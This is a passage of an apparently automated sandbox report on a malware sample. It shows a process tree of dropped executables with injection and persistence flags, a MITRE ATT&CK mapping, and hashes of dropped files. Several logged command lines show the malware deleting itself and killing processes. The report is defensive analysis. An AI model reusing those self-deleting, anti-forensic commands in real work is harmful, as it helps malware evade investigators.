                                                                                  • Modifies registry class
                                                                                  PID:5392
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  PID:5456
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  PID:5396
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  PID:3712
                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                  1⤵
                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                  PID:5880
                                                                                • C:\Users\Admin\AppData\Local\Temp\EA70.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\EA70.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4108
                                                                                • C:\Users\Admin\AppData\Local\Temp\ECA4.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\ECA4.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5300
                                                                                • C:\Users\Admin\AppData\Local\Temp\33A.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\33A.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:5892
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\33A.exe"
                                                                                    2⤵
                                                                                      PID:4284
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /T 10 /NOBREAK
                                                                                        3⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4980
                                                                                  • C:\Users\Admin\AppData\Local\Temp\CD0.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\CD0.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5424
                                                                                  • C:\Users\Admin\AppData\Local\Temp\E77.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\E77.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5656
                                                                                  • C:\Users\Admin\AppData\Local\Temp\157D.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\157D.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4716
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      2⤵
                                                                                        PID:5996
                                                                                    • C:\Users\Admin\AppData\Local\Temp\2174.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\2174.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:668
                                                                                      • C:\Users\Admin\AppData\Local\Temp\2174.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\2174.exe"
                                                                                        2⤵
                                                                                          PID:4164
                                                                                      • C:\Users\Admin\AppData\Local\Temp\2917.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\2917.exe
                                                                                        1⤵
                                                                                          PID:5152
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                                                            2⤵
                                                                                              PID:4572
                                                                                              • C:\Users\Admin\AppData\Roaming\874D.tmp.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\874D.tmp.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4808
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" "4808" "C:\Users\Admin\AppData\Roaming\874D.tmp.exe""
                                                                                                  4⤵
                                                                                                    PID:5272
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      taskkill /F /PID "4808"
                                                                                                      5⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:4660
                                                                                                    • C:\Windows\system32\choice.exe
                                                                                                      choice /C Y /N /D Y /T 3
                                                                                                      5⤵
                                                                                                        PID:5640
                                                                                                  • C:\Users\Admin\AppData\Roaming\8A8A.tmp.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\8A8A.tmp.exe"
                                                                                                    3⤵
                                                                                                      PID:4460
                                                                                                    • C:\Users\Admin\AppData\Roaming\8C6F.tmp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\8C6F.tmp.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:3816
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                                                                        4⤵
                                                                                                        • Drops startup file
                                                                                                        PID:4112
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Windows\SysWOW64\explorer.exe" >> NUL
                                                                                                      3⤵
                                                                                                        PID:5128
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 127.0.0.1
                                                                                                          4⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:5636
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\30C8.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\30C8.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops startup file
                                                                                                    • NTFS ADS
                                                                                                    PID:4668
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\357C.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\357C.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5732
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3F51.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\3F51.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:224
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4482.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\4482.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2724
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4A11.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\4A11.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:592
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      2⤵
                                                                                                        PID:5256
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5388.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\5388.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3732
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 272
                                                                                                        2⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Program crash
                                                                                                        PID:5476
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5955.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\5955.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5872
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:4288
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:1184
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:2616
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:5836
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:3688
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:4652
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:5016
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:932
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4296
                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:6044
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:5560
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\421B.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\421B.exe
                                                                                                                      1⤵
                                                                                                                        PID:4664
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 868
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5932
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 880
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:4800
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 920
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5296
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 988
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5808
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1160
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5160
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1220
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6000
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1560
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:4596
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1620
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5616
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1600
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:1184
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5362.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5362.exe
                                                                                                                        1⤵
                                                                                                                          PID:5300
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\663F.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\663F.exe
                                                                                                                          1⤵
                                                                                                                            PID:3316
                                                                                                                            • C:\Users\Admin\mojpivf.exe
                                                                                                                              "C:\Users\Admin\mojpivf.exe" /d"C:\Users\Admin\AppData\Local\Temp\663F.exe" /e5503111000000005
                                                                                                                              2⤵
                                                                                                                                PID:5900

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                            Persistence

                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                            1
                                                                                                                            T1060

                                                                                                                            BITS Jobs

                                                                                                                            1
                                                                                                                            T1197

                                                                                                                            Defense Evasion

                                                                                                                            Modify Registry

                                                                                                                            3
                                                                                                                            T1112

                                                                                                                            BITS Jobs

                                                                                                                            1
                                                                                                                            T1197

                                                                                                                            Install Root Certificate

                                                                                                                            1
                                                                                                                            T1130

                                                                                                                            Credential Access

                                                                                                                            Credentials in Files

                                                                                                                            4
                                                                                                                            T1081

                                                                                                                            Discovery

                                                                                                                            Software Discovery

                                                                                                                            1
                                                                                                                            T1518

                                                                                                                            Query Registry

                                                                                                                            4
                                                                                                                            T1012

                                                                                                                            System Information Discovery

                                                                                                                            5
                                                                                                                            T1082

                                                                                                                            Security Software Discovery

                                                                                                                            1
                                                                                                                            T1063

                                                                                                                            Peripheral Device Discovery

                                                                                                                            1
                                                                                                                            T1120

                                                                                                                            Remote System Discovery

                                                                                                                            1
                                                                                                                            T1018

                                                                                                                            Collection

                                                                                                                            Data from Local System

                                                                                                                            4
                                                                                                                            T1005

                                                                                                                            Command and Control

                                                                                                                            Web Service

                                                                                                                            1
                                                                                                                            T1102

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                              MD5

                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                              SHA1

                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                              SHA256

                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                              SHA512

                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                              MD5

                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                              SHA1

                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                              SHA256

                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                              SHA512

                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                            • C:\Program Files\Reference Assemblies\AIISQTJARO\ultramediaburner.exe
                                                                                                                              MD5

                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                              SHA1

                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                              SHA256

                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                              SHA512

                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                            • C:\Program Files\Reference Assemblies\AIISQTJARO\ultramediaburner.exe
                                                                                                                              MD5

                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                              SHA1

                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                              SHA256

                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                              SHA512

                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                            • C:\Program Files\install.dat
                                                                                                                              MD5

                                                                                                                              806c3221a013fec9530762750556c332

                                                                                                                              SHA1

                                                                                                                              36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                              SHA256

                                                                                                                              9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                              SHA512

                                                                                                                              56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                            • C:\Program Files\install.dat
                                                                                                                              MD5

                                                                                                                              31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                              SHA1

                                                                                                                              c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                              SHA256

                                                                                                                              b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                              SHA512

                                                                                                                              3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                            • C:\Program Files\install.dll
                                                                                                                              MD5

                                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                              SHA1

                                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                              SHA256

                                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                              SHA512

                                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                            • C:\Program Files\install.dll
                                                                                                                              MD5

                                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                              SHA1

                                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                              SHA256

                                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                              SHA512

                                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                            • C:\Program Files\libEGL.dll
                                                                                                                              MD5

                                                                                                                              cc0f81a657d6887e246f49151e60123d

                                                                                                                              SHA1

                                                                                                                              1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                              SHA256

                                                                                                                              31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                              SHA512

                                                                                                                              8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\13-75da7-57d-d6fbb-ea718c19b5538\Torekywose.exe
                                                                                                                              MD5

                                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                                              SHA1

                                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                              SHA256

                                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                              SHA512

                                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\13-75da7-57d-d6fbb-ea718c19b5538\Torekywose.exe
                                                                                                                              MD5

                                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                                              SHA1

                                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                              SHA256

                                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                              SHA512

                                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\13-75da7-57d-d6fbb-ea718c19b5538\Torekywose.exe.config
                                                                                                                              MD5

                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                              SHA1

                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                              SHA256

                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                              SHA512

                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1f-db415-6d3-dbe80-276a41928b606\Kenessey.txt
                                                                                                                              MD5

                                                                                                                              97384261b8bbf966df16e5ad509922db

                                                                                                                              SHA1

                                                                                                                              2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                              SHA256

                                                                                                                              9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                              SHA512

                                                                                                                              b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1f-db415-6d3-dbe80-276a41928b606\Lokaehydibu.exe
                                                                                                                              MD5

                                                                                                                              2e91d25073151415f8c39de2262cbba8

                                                                                                                              SHA1

                                                                                                                              32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                              SHA256

                                                                                                                              0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                              SHA512

                                                                                                                              306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1f-db415-6d3-dbe80-276a41928b606\Lokaehydibu.exe
                                                                                                                              MD5

                                                                                                                              2e91d25073151415f8c39de2262cbba8

                                                                                                                              SHA1

                                                                                                                              32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                              SHA256

                                                                                                                              0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                              SHA512

                                                                                                                              306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1f-db415-6d3-dbe80-276a41928b606\Lokaehydibu.exe.config
                                                                                                                              MD5

                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                              SHA1

                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                              SHA256

                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                              SHA512

                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                              MD5

                                                                                                                              41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                              SHA1

                                                                                                                              0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                              SHA256

                                                                                                                              97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                              SHA512

                                                                                                                              5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                              MD5

                                                                                                                              41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                              SHA1

                                                                                                                              0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                              SHA256

                                                                                                                              97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                              SHA512

                                                                                                                              5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                              MD5

                                                                                                                              3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                              SHA1

                                                                                                                              55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                              SHA256

                                                                                                                              4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                              SHA512

                                                                                                                              f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                              MD5

                                                                                                                              3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                              SHA1

                                                                                                                              55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                              SHA256

                                                                                                                              4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                              SHA512

                                                                                                                              f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                              MD5

                                                                                                                              3bc84c0e8831842f2ae263789217245d

                                                                                                                              SHA1

                                                                                                                              d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                              SHA256

                                                                                                                              757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                              SHA512

                                                                                                                              f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                              MD5

                                                                                                                              3bc84c0e8831842f2ae263789217245d

                                                                                                                              SHA1

                                                                                                                              d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                              SHA256

                                                                                                                              757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                              SHA512

                                                                                                                              f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                              MD5

                                                                                                                              25d9f83dc738b4894cf159c6a9754e40

                                                                                                                              SHA1

                                                                                                                              152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                              SHA256

                                                                                                                              8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                              SHA512

                                                                                                                              41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                              MD5

                                                                                                                              25d9f83dc738b4894cf159c6a9754e40

                                                                                                                              SHA1

                                                                                                                              152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                              SHA256

                                                                                                                              8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                              SHA512

                                                                                                                              41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                              MD5

                                                                                                                              e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                              SHA1

                                                                                                                              1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                              SHA256

                                                                                                                              8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                              SHA512

